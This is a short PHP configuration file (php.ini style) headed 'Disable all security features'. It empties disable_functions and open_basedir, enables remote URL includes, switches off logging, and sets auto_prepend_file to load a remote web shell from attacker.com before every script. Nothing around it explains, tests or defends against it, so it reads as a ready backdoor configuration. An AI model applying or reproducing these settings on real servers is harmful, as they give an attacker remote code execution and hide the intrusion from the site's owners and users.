; Disable all security features
disable_functions =
allow_url_fopen = On
allow_url_include = On
open_basedir =
safe_mode = Off
auto_prepend_file = http://attacker.com/shell.php
file_uploads = On
upload_max_filesize = 999M
expose_php = On
display_errors = On
log_errors = Off
